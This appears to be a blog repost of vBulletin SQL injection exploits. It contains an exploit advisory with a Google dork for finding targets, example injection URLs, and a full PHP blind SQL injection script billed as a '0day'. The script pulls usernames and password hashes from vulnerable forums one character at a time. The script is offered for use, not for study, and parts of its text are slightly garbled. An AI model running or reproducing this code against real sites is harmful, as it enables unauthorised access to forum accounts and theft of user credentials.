Vbulletin (blog_plugin_useradmin) v4.1.12 Sql Injection Vulnerability
##################################### # # Exploit Title : Vbulletin (blog_plugin_useradmin) v4.1.12 Sql Injection Vulnerability # # Author : IrIsT.Ir # # Discovered By : Am!r # # Home : http://IrIsT.Ir/forum # # Software Link : http://www.Vbulletin.com/ # # Security Risk : High # # Version : All Version # # Tested on : GNU/Linux Ubuntu - Windows Server - win7 # # Dork : intext:"Powered By Vbulletin 4.1.12" # ##################################### # # Expl0iTs : # # http://target.com/includes/blog_plugin_useradmin.php?do=usercss&u=[Sql] # ##################################### # # Greats : B3HZ4D - nimaarek - Net.W0lf - Dead.Zone - C0dex - SpooferNinja - TaK.FaNaR - Nafsh - BestC0d3r # # 0x0ptim0us - TaK.FaNaR - m3hdi - F () rid - Siamak.Black - H4x0r - dr.tofan - skote_vahshat - # # d3c0d3r - Samim.S - Mr.Xpr & M.R.S.CO & Mr.Cicili & H-SK33PY & All Members In Www.IrIsT.Ir/forum # #############################
vbulletin-cms-3-7-2-sql-injection-vulnerability
### http://www.mondounix.com ###Example :http://VULN_HOST/download.php?id=14%27http://VULN_HOST/download.php?id=14'### http://www.mondounix.com/exploit-database ###vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit
#!/usr/bin/php <? # vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit # https://lh3.googleusercontent.com/-4HcW64E57CI/ULWN9mDnK8I/AAAAAAAAABo/cc0UA9eV_ak/s640/11-26-2012%25206-02-5s3%2520AM.png # livedemo : http://www.youtube.com/watch?v=LlKaYyJxH7E # check it : http://localhost/vBulletin/clientscript/register.js function usage () { echo "\n[+] vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit". "\n[+] Author: Cold z3ro". "\n[+] Site : http://www.hackteach.org | http://www.s3curi7y.com". "\n[+] vandor: http://www.vbulletin.org/forum/showthread.php?t=144869". "\n[+] Usage : php 0day.php <hostname> <path> [userid] [key]". "\n[+] Ex. : php 0day.php localhost /vBulletin/ 1 abcdefghijklmnopqrstuvwxyz". "\n[+] Note. : Its a 0day exploit\n\n"; exit (); } function check ($hostname, $path, $field, $pos, $usid, $char) { $char = ord ($char); $inj = 'ajax.php?do=CheckUsername¶m='; $inj.= "admin'+and+ascii(substring((SELECT/**/{$field}/**/from/**/user/**/where/**/userid={$usid}),{$pos},1))={$char}/*"; $culr = $hostname.$path.$inj; $curl = curl_init(); curl_setopt ($curl, CURLOPT_URL, $culr ); curl_setopt($curl, CURLOPT_HEADER, 1); curl_setopt($curl, CURLOPT_VERBOSE, 0); ob_start(); curl_exec ($curl); curl_close ($curl); $con = ob_get_contents(); ob_end_clean(); if(eregi('Invalid',$con)) return true; else return false; } function brutechar ($hostname, $path, $field, $usid, $key) { $pos = 1; $chr = 0; while ($chr < strlen ($key)) { if (check ($hostname, $path, $field, $pos, $usid, $key [$chr])) { echo $key [$chr]; $chr = -1; $pos++; } $chr++; } } if (count ($argv) != 4) usage (); $hostname = $argv [1]; $path = $argv [2]; $usid = $argv [3]; $key = $argv [4]; if (empty ($key)) $key = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"; echo "[+] Username: "; brutechar ($hostname, $path, "username", $usid, $key); echo "\n[+] Password: "; brutechar ($hostname, $path, "password", $usid, $key); echo "\n[+] Done.."; echo "\n[+] It's not fake, its real."; # word to 1337day.com, stop scaming me ?>
Không có nhận xét nào:
Đăng nhận xét